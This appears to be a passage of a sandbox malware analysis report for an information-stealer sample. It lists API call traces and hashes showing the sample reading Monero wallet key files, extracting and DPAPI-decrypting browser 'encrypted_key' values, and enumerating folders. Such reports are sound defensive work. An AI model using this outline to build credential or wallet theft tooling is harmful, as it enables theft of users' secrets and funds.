                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BD801
                                • lstrlen.KERNEL32(00000000), ref: 008BD99F
                                • lstrlen.KERNEL32(00000000), ref: 008BD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 008BDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d94fcd8244ec05124559be5811811602eda1b2fc6f99c5ce7d91b9cc1de89917
                                • Instruction ID: 1bd61b57404ee1c2750b3b3ded348a78d7f5f7ffa40becf79c6d409dda943e38
                                • Opcode Fuzzy Hash: d94fcd8244ec05124559be5811811602eda1b2fc6f99c5ce7d91b9cc1de89917
                                • Instruction Fuzzy Hash: BB81CA729101189BDB08EBA8EC96EEE7738FF14304F50452DF516E6191EE34AA09CB67
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,008D1580,008D0D92), ref: 008BF54C
                                • lstrlen.KERNEL32(00000000), ref: 008BF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: c4df64520ea681b948d6b8fc1bf9a0a4141bf87f5893095856817afca1d3e107
                                • Instruction ID: b648b9ef32fd23592504e835ba98d0eb57419d2c23d6c3343dafd8d109843c68
                                • Opcode Fuzzy Hash: c4df64520ea681b948d6b8fc1bf9a0a4141bf87f5893095856817afca1d3e107
                                • Instruction Fuzzy Hash: 8F51D37191010CA7DB18FBA8EC96EED7778FF54304F40852DE516D6191EE349A09CBA3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: d725cba340f0f607585b26885617b3fd105bdafce071db2eb3bacd9a4f50835b
                                • Instruction ID: 4203855d27dcd97777f6ac77b3b111e3a154f2e940e4310d1fbbeb55bd9dbf4e
                                • Opcode Fuzzy Hash: d725cba340f0f607585b26885617b3fd105bdafce071db2eb3bacd9a4f50835b
                                • Instruction Fuzzy Hash: 5E413DB1D10109ABCB08EFE4D885FFEB774FB54708F10851CE416A6290DB75AA06DFA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008B9D39
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                  • Part of subcall function 008B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                  • Part of subcall function 008B9AC0: LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                  • Part of subcall function 008B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9B84
                                  • Part of subcall function 008B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 008B9BA3
                                  • Part of subcall function 008B9B60: LocalFree.KERNEL32(?), ref: 008B9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 01f24c761c70b04180e7de0e2e9958c825d0b3c36cb25ce6443725d4ed6ce55e
                                • Instruction ID: 9398c140e850d8cb048adc45898ba7ec5e5f85f2c27f0a8d42355ba1a0bb042d
                                • Opcode Fuzzy Hash: 01f24c761c70b04180e7de0e2e9958c825d0b3c36cb25ce6443725d4ed6ce55e
                                • Instruction Fuzzy Hash: 7B310DB5D10209ABCF14DBE8DC85EEEB7B8FF48304F144519EA55E7341EA359A04CBA1
                                APIs
                                • CreateFileA.KERNEL32(008C3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008C3AEE,?), ref: 008C92FC
                                • GetFileSizeEx.KERNEL32(000000FF,008C3AEE), ref: 008C9319
                                • CloseHandle.KERNEL32(000000FF), ref: 008C9327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 6e31a977a1dcc6fe080f43f0bf5bab951a9859a0b5483a78906795015ec1d73c
                                • Instruction ID: b4e8ba5461506bd745da8803f3b7fba3d2ca3b472570b6c8cf20971e5710362d
                                • Opcode Fuzzy Hash: 6e31a977a1dcc6fe080f43f0bf5bab951a9859a0b5483a78906795015ec1d73c
                                • Instruction Fuzzy Hash: 27F01975E40208ABDB10DBF1DC49FAEB7B9FB58710F108698F655EB2C0D670A6028F40
                                APIs
                                • __getptd.LIBCMT ref: 008CC74E
                                  • Part of subcall function 008CBF9F: __amsg_exit.LIBCMT ref: 008CBFAF
                                • __getptd.LIBCMT ref: 008CC765
                                • __amsg_exit.LIBCMT ref: 008CC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 008CC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: ee82340b7262c732c8d2041f02bf154cc95d6a490564fbb06772ab638b841937
                                • Instruction ID: 3f9ca720bb0b02eb09f16891c69be23159009ba61f7db26fc7fe968800174589
                                • Opcode Fuzzy Hash: ee82340b7262c732c8d2041f02bf154cc95d6a490564fbb06772ab638b841937
                                • Instruction Fuzzy Hash: 17F04432905A149AEB25BBAC9807F5A33B0FB00724F21424EF418EA2D2CF74D9409A5B
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4F7A
                                • lstrcat.KERNEL32(?,008D1070), ref: 008C4F97
                                • lstrcat.KERNEL32(?,007B8938), ref: 008C4FAB
                                • lstrcat.KERNEL32(?,008D1074), ref: 008C4FBD
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C492C
                                  • Part of subcall function 008C4910: FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                  • Part of subcall function 008C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                  • Part of subcall function 008C4910: FindClose.KERNEL32(000000FF), ref: 008C4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 17efd5296e5d69fa4e7700dc3bd94ab1a55f340b3cef20972e622509549017a3
                                • Instruction ID: bee18184bd9752c1fa87522528d7a1c5d330ab2372e57fde17f8d4a8bb606c34
                                • Opcode Fuzzy Hash: 17efd5296e5d69fa4e7700dc3bd94ab1a55f340b3cef20972e622509549017a3
                                • Instruction Fuzzy Hash: 7A2195B6900208A7CB54F7E4DC46FE9333CFB64340F004558B65AD6281EE74AAC9CBA3